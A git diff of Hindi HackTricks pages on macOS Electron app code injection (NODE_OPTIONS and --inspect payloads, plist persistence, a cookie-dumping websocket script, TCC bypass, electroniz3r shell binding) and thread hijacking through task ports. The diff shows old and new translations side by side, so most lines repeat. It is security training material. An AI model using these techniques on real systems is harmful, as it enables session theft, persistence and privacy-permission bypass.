आप पेलोड को एक अलग फाइल में संग्रहित कर सकते हैं और इसे निष्पादित कर सकते हैं: आप पेयलोड को एक अलग फ़ाइल में स्टोर कर सकते हैं और इसे एक्सीक्यूट कर सकते हैं:
{% code overflow="wrap" %}
```bash ```bash
# Content of /tmp/payload.js # Content of /tmp/payload.js
require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator'); require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator');
@ -145,14 +143,14 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di
{% endcode %} {% endcode %}
{% hint style="danger" %} {% hint style="danger" %}
यदि fuse **`EnableNodeOptionsEnvironmentVariable`** **निष्क्रिय** है, तो ऐप **NODE\_OPTIONS** env var को **अनदेखा** करेगा जब तक कि env variable **`ELECTRON_RUN_AS_NODE`** सेट नहीं किया जाता, जिसे भी **अनदेखा** किया जाएगा यदि fuse **`RunAsNode`** निष्क्रिय है। यदि फ्यूज **`EnableNodeOptionsEnvironmentVariable`** **अक्षम** है, तो ऐप **NODE\_OPTIONS** एनवायरन्मेंट वेरिएबल को **अनदेखा** करेगा जब तक एनवायरन्मेंट वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता है, जिसे भी **अनदेखा** किया जाएगा अगर फ्यूज **`RunAsNode`** अक्षम है।
यदि आप **`ELECTRON_RUN_AS_NODE`** सेट नहीं करते हैं, तो आपको **त्रुटि** मिलेगी: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.` अगर आप **`ELECTRON_RUN_AS_NODE`** सेट नहीं करते हैं, तो आपको **त्रुटि** मिलेगी: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
{% endhint %} {% endhint %}
### App Plist से Injection ### एप्लिकेशन प्लिस्ट से इंजेक्शन
आप इस env variable का दुरुपयोग plist में इन कुंजियों को जोड़कर पर्सिस्टेंस बनाए रखने के लिए कर सकते हैं: आप इस एनवायरन्मेंट वेरिएबल का दुरुपयोग कर सकते हैं एक प्लिस्ट में स्थायिति बनाने के लिए इन कुंजियों को जोड़कर:
```xml ```xml
<dict> <dict>
<key>EnvironmentVariables</key> <key>EnvironmentVariables</key>
@ -168,12 +166,10 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di
<true/> <true/>
</dict> </dict>
``` ```
## RCE के साथ निरीक्षण ## RCE इंस्पेक्टिंग के साथ
[**इस**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f) के अनुसार, यदि आप Electron एप्लिकेशन को **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** जैसे फ्लैग्स के साथ निष्पादित करते हैं, तो एक **डीबग पोर्ट खुल जाएगा** जिससे आप उससे जुड़ सकते हैं (उदाहरण के लिए Chrome में `chrome://inspect` से) और आप उस पर **कोड इंजेक्ट कर सकते हैं** या यहां तक कि नए प्रोसेस भी लॉन्च कर सकते हैं।\ [**इस**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f) के अनुसार, यदि आप **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** जैसे ध्वजों के साथ एक इलेक्ट्रॉन एप्लिकेशन को निष्पादित करते हैं, तो एक **डीबग पोर्ट खुला रहेगा** ताकि आप इससे कनेक्ट कर सकें (उदाहरण के लिए Chrome से `chrome://inspect` में से) और आप उस पर **कोड इंजेक्ट** कर सकें या नए प्रक्रियाएँ भी चला सकें।\
उदाहरण के लिए: उदाहारण के लिए:
{% code overflow="wrap" %}
```bash ```bash
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229 /Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
# Connect to it using chrome://inspect and execute a calculator with: # Connect to it using chrome://inspect and execute a calculator with:
@ -182,14 +178,14 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
{% endcode %} {% endcode %}
{% hint style="danger" %} {% hint style="danger" %}
यदि fuse**`EnableNodeCliInspectArguments`** अक्षम है, तो ऐप **node पैरामीटर्स को अनदेखा करेगा** (जैसे `--inspect`) जब तक कि env वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता, जिसे भी **अनदेखा किया जाएगा** यदि fuse **`RunAsNode`** अक्षम है यदि फ्यूज **`EnableNodeCliInspectArguments`** अक्षम है, तो ऐप **नोड पैरामीटर** (जैसे `--inspect`) को नजरअंदाज करेगा जब तक इसे चालू नहीं किया जाता है, जब तक एनवी वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता है, जिसे फ्यूज **`RunAsNode`** अक्षम होने पर भी **नजरअंदाज** किया जाएगा
हालांकि, आप अभी भी **electron पैरामीटर `--remote-debugging-port=9229`** का उपयोग कर सकते हैं लेकिन पिछला पेलोड अन्य प्रोसेसेस को निष्पादित करने के लिए काम नहीं करेगा। हालांकि, आप अब भी **इलेक्ट्रॉन पैरामीटर `--remote-debugging-port=9229`** का उपयोग कर सकते हैं लेकिन पिछला पेलोड अन्य प्रक्रियाओं को निष्पादित करने के लिए काम नहीं करेगा।
{% endhint %} {% endhint %}
पैरामीटर **`--remote-debugging-port=9222`** का उपयोग करके, आप Electron App से कुछ जानकारी चुरा सकते हैं जैसे कि **history** (GET कमांड्स के साथ) या ब्राउज़र के **cookies** (क्योंकि वे ब्राउज़र के अंदर **decrypted** होते हैं और एक **json endpoint** होता है जो उन्हें देगा)। पैरामीटर **`--remote-debugging-port=9222`** का उपयोग करके इलेक्ट्रॉन ऐप से कुछ जानकारी चुरा सकते हैं जैसे **हिस्ट्री** (GET कमांड के साथ) या ब्राउज़र के **कुकी** (जैसे कि वे ब्राउज़र के अंदर **डिक्रिप्ट** होते हैं और एक **जेसन एंडपॉइंट** है जो उन्हें देगा)।
आप यह कैसे कर सकते हैं इसके बारे में [**यहाँ**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) और [**यहाँ**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) सीख सकते हैं और स्वचालित उपकरण [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) या एक साधारण स्क्रिप्ट का उपयोग कर सकत है जैसे: आप यह कैसे कर सकते हैं [**यहाँ**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) और [**यहाँ**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) और स्वचालित उपकरण [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) या एक सरल स्क्रिप्ट का उपयोग करें:
```python ```python
import websocket import websocket
ws = websocket.WebSocket() ws = websocket.WebSocket()
@ -197,11 +193,11 @@ ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00",
ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}') ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
print(ws.recv() print(ws.recv()
``` ```
इस [**ब्लॉगपोस्ट**](https://hackerone.com/reports/1274695) में, इस डिबगिंग का दुरुपयोग करके एक हेडलेस क्रोम को **मनमानी फाइलों को मनमाने स्थानों पर डाउनलोड करने** के लिए किया जाता है [**इस ब्लॉगपोस्ट**](https://hackerone.com/reports/1274695) में, इस डीबगिंग का दुरुपयोग किया गया है ताकि एक हेडलेस क्रोम **किसी भी स्थान पर विविध फ़ाइलें डाउनलोड कर सके**
### App Plist से इंजेक्शन ### एप्लिकेशन प्लिस्ट से इंजेक्शन
आप इस env वेरिएबल का दुरुपयोग प्लिस्ट में इन कीज़ को जोड़कर पर्सिस्टेंस बनाए रखने के लिए कर सकते हैं: आप इस env वेरिएबल का दुरुपयोग प्लिस्ट में कर सकते हैं ताकि स्थिरता बनाए रखने के लिए इन कुंजियों को जोड़ सकें:
```xml ```xml
<dict> <dict>
<key>ProgramArguments</key> <key>ProgramArguments</key>
@ -215,22 +211,22 @@ print(ws.recv()
<true/> <true/>
</dict> </dict>
``` ```
## पुराने संस्करणों का दुरुपयोग करके TCC बायपास ## TCC बायपास पुराने संस्करणों का दुरुपयोग
{% hint style="success" %} {% hint style="success" %}
macOS का TCC डेमन एप्लिकेशन के निष्पादित संस्करण की जांच नहीं करता है। इसलिए यदि आप **Electron एप्लिकेशन में कोड इंजेक्ट नहीं कर सकते** पिछली तकनीकों के साथ, आप एप्लिकेशन का पिछला संस्करण डाउनलोड कर सकते हैं और उसमें कोड इंजेक्ट कर सकते हैं क्योंकि उसे अभी भी TCC विशेषाधिकार मिलेंगे (जब तक कि Trust Cache इसे रोकता नहीं है)। macOS का TCC डेमन एप्लिकेशन के निष्पादित संस्करण की जांच नहीं करता। इसलिए, अगर आप **किसी भी पिछली तकनीक के साथ इलेक्ट्रॉन एप्लिकेशन में कोड इंजेक्ट नहीं कर सकते** तो आप पिछले संस्करण का ऐप डाउनलोड करके उसमें कोड इंजेक्ट कर सकते हैं क्योंकि यह अभी भी TCC अधिकार प्राप्त करेगा (यदि ट्रस्ट कैश इसे रोकता नहीं है)।
{% endhint %} {% endhint %}
## गैर JS कोड चलाना ## गैर JS कोड चलाएं
पिछली तकनीकें आपको **Electron एप्लिकेशन की प्रक्रिया के अंदर JS कोड चलाने की अनुमति देंगी**। हालांकि, याद रखें कि **चाइल्ड प्रोसेस माता-पिता एप्लिकेशन के समान सैंडबॉक्स प्रोफाइल के अंतर्गत चलते हैं** और **उनके TCC अनुमतियों को विरासत में प्राप्त करते हैं**।\ पिछली तकनीक आपको **इलेक्ट्रॉन एप्लिकेशन की प्रक्रिया में JS कोड चलाने** की अनुमति देगी। हालांकि, ध्यान रखें कि **बच्ची प्रक्रियाएँ माता एप्लिकेशन के समान सैंडबॉक्स प्रोफ़ाइल के तहत चलती हैं** और **उनकी TCC अनुमतियों को वे विरासत में लेती हैं**।\
इसलिए, यदि आप उदाहरण के लिए कैमरा या माइक्रोफोन तक पहुंचने के लिए अधिकारों का दुरुपयोग करना चाहते हैं, आप सिर्फ **प्रक्रिया से एक अन्य बाइनरी चला सकते हैं**। इसलिए, यदि आप कैमरा या माइक्रोफोन तक पहुंचने के लिए अधिकारों का दुरुपयोग करना चाहते हैं, तो आप बस **प्रक्रिया से एक और बाइनरी चला सकते हैं**।
## स्वचालित इंजेक्शन ## स्वचालित इंजेक्शन
उपकरण [**electroniz3r**](https://github.com/r3ggi/electroniz3r) का उपयोग करके आसानी से **कमजोर Electron एप्लिकेशनों को खोजने** और उनमें कोड इंजेक्ट करने के लिए किया जा सकता है। यह उपकरण **`--inspect`** तकनीक का उपयोग करने का प्रयास करेगा: उपकरण [**electroniz3r**](https://github.com/r3ggi/electroniz3r) को आसानी से **संकटशील इलेक्ट्रॉन एप्लिकेशनें** खोजने और उन पर कोड इंजेक्ट करने के लिए उपयोग किया जा सकता है। यह उपकरण **`--inspect`** तकनीक का उपयोग करने का प्रयास करेगा:
आपको इसे स्वयं कंपाइल करना होगा और इसे इस तरह उपयोग कर सकते हैं: आपको इसे खुद कंपाइल करना होगा और इसे इस प्रकार से उपयोग कर सकते हैं:
```bash ```bash
# Find electron apps # Find electron apps
./electroniz3r list-apps ./electroniz3r list-apps
@ -274,14 +270,14 @@ Shell binding requested. Check `nc 127.0.0.1 12345`
<details> <details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें * **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs सबमिट करके
</details> </details>

View file

@ -1,16 +1,16 @@
# macOS थ्रेड इंजेक्शन वाया टास्क पोर्ट # macOS Thread Injection via Task port
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जानें AWS हैकिंग को शून्य से हीरो बनाने के लिए</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके: दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**. * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें. * **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
@ -22,47 +22,47 @@ HackTricks का समर्थन करने के अन्य तरी
## 1. थ्रेड हाइजैकिंग ## 1. थ्रेड हाइजैकिंग
्रारंभ में, रिमोट टास्क से थ्रेड सूची प्राप्त करने के लिए **`task_threads()`** फंक्शन को टास्क पोर्ट पर आह्वान किया जाता है। एक थ्रेड को हाइजैकिंग के लिए चुना जाता है। यह दृष्टिकोण पारंपरिक कोड इंजेक्शन विधियों से भिन्न होता है क्योंकि नए मिटिगेशन द्वारा `thread_create_running()` को ब्लॉक करने के कारण नए रिमोट थ्रेड का निर्माण प्रतिबंधित है। हले, दूरस्थ कार्य से थ्रेड सूची प्राप्त करने के लिए टास्क पोर्ट पर **`task_threads()`** फ़ंक्शन को आमंत्रित किया जाता है। हाइजैकिंग के लिए एक थ्रेड चुना जाता है। यह दृष्टिकोण पारंपरिक कोड इंजेक्शन विधियों से भिन्न है क्योंकि नए दूरस्थ थ्रेड बनाना नए मिटिगेशन द्वारा निषिद्ध है जिसके कारण `thread_create_running()` को ब्लॉक कर दिया गया है।
थ्रेड को नियंत्रित करने के लिए, **`thread_suspend()`** को कॉल किया जाता है, जिससे इसकी क्रियान्विति रुक जाती है। थ्रेड को नियंत्रित करने के लिए, **`thread_suspend()`** को कॉल किया जाता है, जिससे इसका निष्पादन रोक दिया जाता है।
रिमोट थ्रेड पर अनुमति दी गई केवल क्रियाएँ **रोकना** और **शुरू करना**, **प्राप्त करना** और **संशोधित करना** इसके रजिस्टर मूल्यों की हैं। रिमोट फंक्शन कॉल्स को रजिस्टर `x0` से `x7` तक **तर्कों** के लिए सेट करके, **`pc`** को वांछित फंक्शन के लिए टारगेट करके, और थ्रेड को सक्रिय करके शुरू किया जाता है। यह सुनिश्चित करना कि थ्रेड रिटर्न के बाद क्रैश न हो, रिटर्न का पता लगाना आवश्यक है। दूरस्थ थ्रेड पर केवल **रोकना** और **शुरू** करने, **रजिस्टर मानों को प्राप्त** और **संशोधित** करने की अनुमति है। दूरस्थ कार्यों को आरंभ करने के लिए रजिस्टर `x0` से `x7` को **आर्ग्यूमेंट्स** पर सेट करके, **`pc`** को लक्षित फ़ंक्शन पर सेट करके, और थ्रेड को सक्रिय करके दूरस्थ फ़ंक्शन कॉल किए जाते हैं। वापसी के बाद थ्रेड क्रैश न होने की सुनिश्चित करने के लिए वापसी को पहचानना आवश्यक है।
एक रणनीति में रिमोट थ्रेड के लिए `thread_set_exception_ports()` का उपयोग करके **एक अपवाद हैंडलर पंजीकृत करना** शामिल है, फंक्शन कॉल से पहले `lr` रजिस्टर को एक अमान्य पते पर सेट करना। इससे फंक्शन निष्पादन के बाद एक अपवाद ट्रिगर होता है, जो अपवाद पोर्ट को एक संदेश भेजता है, जिससे थ्रेड की स्थिति का निरीक्षण करके रिटर्न मूल्य की वसूली संभव होती है। वैकल्पिक रूप से, Ian Beer के triple\_fetch एक्सप्लॉइट से लिया गया, `lr` को अनंत रूप से लूप करने के लिए सेट किया जाता है। फिर थ्रेड के रजिस्टरों की निरंतर निगरानी की जाती है जब तक कि **`pc` उस निर्देश की ओर इशारा नहीं करता** एक रणनीति में **दूरस्थ थ्रेड के लिए एक अपवाद हैंडलर रजिस्टर** करना `thread_set_exception_ports()` जिससे फ़ंक्शन कॉल से पहले `lr` रजिस्टर को एक अवैध पते पर सेट किया जाता है। इससे फ़ंक्शन निष्पादन के बाद एक अपवाद उत्पन्न होता है, जो अपवाद पोर्ट को संदेश भेजता है, थ्रेड की स्थिति की जांच को सक्षम करता है ताकि वापसी मूल्य को पुनः प्राप्त किया जा सके। वैकल्पिक रूप से, इयान बीयर के ट्रिपल_फेच धोखाधड़ी से अपनाया गया है, `lr` को अनंतता से लूप करने के लिए सेट किया जाता है। फिर थ्रेड के रजिस्टरों को निरंतर मॉनिटर किया जाता है जब तक **`pc` उस निर्देश को नहीं दिखाता** है
## 2. संचार के लिए Mach पोर्ट्स ## 2. संचार के लिए मैक पोर्ट्स
अगला चरण रिमोट थ्रेड के साथ संचार की सुविधा के लिए Mach पोर्ट्स स्थापित करना शामिल है। ये पोर्ट्स कार्यों के बीच मनमाने सेंड और रिसीव अधिकारों को स्थानांतरित करने में महत्वपूर्ण हैं। अगले चरण में, दूरस्थ थ्रेड के साथ संचार सुविधा स्थापित करने के लिए मैक पोर्ट्स स्थापित करना शामिल है। ये पोर्ट्स कार्यों के बीच विभिन्न भेजने और प्राप्त करने के लिए महत्वपूर्ण हैं।
द्विदिश संचार के लिए, दो Mach रिसीव अधिकार बनाए जाते हैं: एक स्थानीय और दूा रिमोट टास्क में। इसके बाद, प्रत्येक पोर्ट के लिए एक सेंड अधिकार को समकक्ष कार्य में स्थानांतरित किया जाता है, जिससे संदेश विनिमय संभव होता है द्विदिशीय संचार के लिए, दो मैक प्राप्ति अधिकार बनाए जाते हैं: एक स्थानीय और दूरस्ार्य में। इसके बाद, प्रत्येक पोर्ट के लिए एक भेजने का अधिकार विपरीत कार्य में स्थानांतरित किया जाता है, संदेश विनिमय को सक्षम करते हैं
स्थानीय पोर्ट पर ध्यान केंद्रित करते हुए, रिसीव अधिकार स्थानीय कार्य द्वारा रखा जाता है। पोर्ट को `mach_port_allocate()` के साथ बनाया जाता है। चुनौती इस पोर्ट के एक सेंड अधिकार को रिमोट टास्क में स्थानांतरित करने में निहित है स्थानीय पोर्ट पर ध्यान केंद्रित है, स्थानीय कार्य द्वारा प्राप्ति अधिकार को धारण किया जाता है। पोर्ट `mach_port_allocate()` के साथ बनाया जाता है। चुनौती इसमें है कि इस पोर्ट में एक भेजने का अधिकार दूरस्थ कार्य में स्थानांतरित करना
एक रणनीति में `thread_set_special_port()` का उपयोग करके स्थानीय पोर्ट के लिए एक सेंड अधिकार को रिमोट थ्रेड के `THREAD_KERNEL_PORT` में रखना शामिल है। फिर, रिमोट थ्रेड को `mach_thread_self()` को कॉल करने के लिए निर्देशित किया जाता है ताकि सेंड अधिकार प्राप्त किया जा सके। एक रणनीति शामिल है `thread_set_special_port()` का उपयोग करना जिससे स्थानीय पोर्ट के लिए एक भेजने का अधिकार दूरस्थ थ्रेड के `THREAD_KERNEL_PORT` में रखा जाता है। फिर, दूरस्थ थ्रेड को निर्देशित किया जाता है कि `mach_thread_self()` कॉल करें ताकि वह भेजने का अधिकार प्राप्त कर सके।
रिमोट पोर्ट के लिए, प्रक्रिया मूल रूप से उलटी होती है। रिमोट थ्रेड को `mach_reply_port()` के माध्यम से Mach पोर्ट उत्पन्न करने के लिए निर्देशित किया जाता है (क्योंकि `mach_port_allocate()` इसके रिटर्न मैकेनिज्म के कारण अनुपयुक्त है)। पोर्ट निर्माण के बाद, रिमोट थ्रेड में `mach_port_insert_right()` को आह्वान किया जाता है ताकि एक सेंड अधिकार स्थापित किया जा सके। इस अधिकार को फिर कर्नेल में `thread_set_special_port()` का उपयोग करके स्टैश किया जाता है। स्थानीय कार्य में वापस, `thread_get_special_port()` का उपयोग रिमोट थ्रेड पर किया जाता है ताकि रिमोट टास्क में नव आवंटित Mach पोर्ट के लिए एक सेंड अधिकार प्राप्त किया जा सके। दूरस्थ पोर्ट के लिए, प्रक्रिया मूल रूप से उलट दी जाती है। दूरस्थ थ्रेड को निर्देशित किया जाता है कि `mach_reply_port()` के माध्यम से एक मैक पोर्ट उत्पन्न करें (क्योंकि `mach_port_allocate()` अपने वापसी तंत्र के कारण अनुचित है)। पोर्ट निर्माण के बाद, दूरस्थ थ्रेड में `mach_port_insert_right()` को आमंत्रित किया जाता है ताकि एक भेजने का अधिकार स्थापित हो सके। यह अधिकार फिर कर्णल में `thread_set_special_port()` का उपयोग करके छिपाया जाता है। स्थानीय कार्य में, दूरस्थ थ्रेड पर `thread_get_special_port()` का उपयोग किया जाता है ताकि दूरस्थ कार्य में नवीन निर्धारित मैक पोर्ट के लिए भेजने का अधिकार प्राप्त किया जा सके।
इन चरणों के पूरा होने के बाद Mach पोर्ट्स की स्थापना हो जाती है, जिससे द्विदिश संचार के लिए आधार तैयार हो जाता है। इन कदमों के पूरा होने से मैक पोर्ट्स की स्थापना होती है, जो द्विदिशीय संचार के लिए आधार रखती है।
## 3. बेसिक मेमोरी रीड/राइट प्रिमिटिव्स ## 3. मूल मेमोरी पठन/लेखन आधार
इस खंड में, ध्यान बेसिक मेमोरी रीड और राइट प्रिमिटिव्स स्थापित करने के लिए एक्जीक्यूट प्रिमिटिव का उपयोग करने पर है। ये प्रारंभिक चरण रिमोट प्रोसेस पर अधिक नियंत्रण प्राप्त करने के लिए महत्वपूर्ण हैं, हालांकि इस स्तर पर प्रिमिटिव्स कई उद्देश्यों की सेवा नहीं करेंगे। जल्द ही, उन्हें अधिक उन्नत संस्करणों में अपग्रेड किया जाएगा इस खंड में, कार्य को बुनियादी मेमोरी पठन और लेखन आधार स्थापित करने के लिए क्षेत्रिय प्रयोग करने पर ध्यान केंद्रित है। ये प्रारंभिक कदम दूरस्थ प्रक्रिया पर अधिक नियंत्रण प्राप्त करने के लिए महत्वपूर्ण हैं, हालांकि इस स्तर पर प्राथमिक आधार बहुत सारे उद्देश्यों की सेवा नहीं करेंगे। जल्द ही, वे अधिक उन्नत संस्करणों में अपग्रेड किए जाएंगे
### एक्जीक्यूट प्रिमिटिव का उपयोग करके मेमोरी रीडिंग और राइटिंग ### एक्जीक्यूट प्रिमिटिव का उपयोग करके मेमोरी पठन और लेखन
लक्ष्य विशिष्ट फंक्शनों का उपयोग करके मेमोरी रीडिंग और राइटिंग करना है। मेमोरी पढ़ने के लिए, निम्नलिखित संरचना वाले फंक्शनों का उपयोग किया जाता है: लक्ष्य है कि विशेष कार्यों का उपयोग करके मेमोरी पठन और लेखन किया जाए। मेमोरी पठन के लिए, निम्नलिखित संरचना की तुलना करने वाले फंक्शन का उपयोग किया जाता है:
```c ```c
uint64_t read_func(uint64_t *address) { uint64_t read_func(uint64_t *address) {
return *address; return *address;
} }
``` ```
और मेमोरी में लिखने के लिए, इस संरचना के समान कार्यों का उपयोग किया जाता है: और मेमोरी में लेखन के लिए, इस संरचना के समान कार्यों का उपयोग किया जाता है:
```c ```c
void write_func(uint64_t *address, uint64_t value) { void write_func(uint64_t *address, uint64_t value) {
*address = value; *address = value;
} }
``` ```
ये फंक्शन्स दिए गए असेंबली निर्देशों के अनुरूप हैं: ये फ़ंक्शन दिए गए असेम्बली इंस्ट्रक्शंस के समान हैं:
``` ```
_read_func: _read_func:
ldr x0, [x0] ldr x0, [x0]
@ -73,105 +73,71 @@ ret
``` ```
### उपयुक्त फ़ंक्शन्स की पहचान ### उपयुक्त फ़ंक्शन्स की पहचान
सामान्य लाइब्रेरीज़ की स्कैनिंग से इन कार्यों के लिए उपयुक्त उम्मीदवार मिले: सामान्य पुस्तकालयों की जांच ने इन ऑपरेशन्स के लिए उपयुक्त उम्मीदवारों की पहचान की:
1. **मेमोरी पढ़ना:** 1. **मेमोरी पढ़ना:**
[Objective-C रनटाइम लाइब्रेरी](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) से `property_getName()` फ़ंक्शन को मेमोरी पढ़ने के लिए उपयुक्त फ़ंक्शन के रूप में पहचाना गया है। नीचे फ़ंक्शन का विवरण दिया गया है: [Objective-C runtime library](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) से `property_getName()` फ़ंक्शन को मेमोरी पढ़ने के लिए एक उपयुक्त फ़ंक्शन के रूप में पहचाना गया है। नीचे फ़ंक्शन का विवरण दिया गया है:
```c ```c
const char *property_getName(objc_property_t prop) { const char *property_getName(objc_property_t prop) {
return prop->name; return prop->name;
} }
``` ```
यह फ़ंक्शन पहले क्षेत्र को वापस करके `objc_property_t` का पहला फ़ील्ड वापस करने की तरह प्रभावी रूप से काम करता है।
यह फ़ंक्शन प्रभावी रूप से `read_func` की तरह काम करता है, `objc_property_t` के पहले फ़ील्ड को वापस करके।
2. **मेमोरी लिखना:** 2. **मेमोरी लिखना:**
मेमोरी लिखने के लिए पहले से बने फ़ंक्शन को ढूँढना अधिक चुनौतीपूर्ण है। हालांकि, libxpc से `_xpc_int64_set_value()` फ़ंक्शन निम्नलिखित डिसैसेम्बली के साथ एक उपयुक्त उम्मीदवार है: मेमोरी लिखने के लिए एक पूर्व-निर्मित फ़ंक्शन खोजना अधिक चुनौतीपूर्ण है। हालांकि, `libxpc` से `_xpc_int64_set_value()` फ़ंक्शन एक उपयुक्त उम्मीदवार है जिसका निम्नलिखित disassembly है:
``` ```c
__xpc_int64_set_value: __xpc_int64_set_value:
str x1, [x0, #0x18] str x1, [x0, #0x18]
ret ret
``` ```
64-बिट लिखने के लिए एक विशिष्ट पते पर, दूरस्थ कॉल को इस प्रकार संरचित किया गया है: एक विशिष्ट पते पर 64-बिट लेख करने के लिए, रिमोट कॉल को इस प्रकार संरचित किया जाता है:
```c ```c
_xpc_int64_set_value(address - 0x18, value) _xpc_int64_set_value(address - 0x18, value)
``` ```
## 4. साझा मेमोरी सेटअप ## 4. साझा स्मृति सेटअप
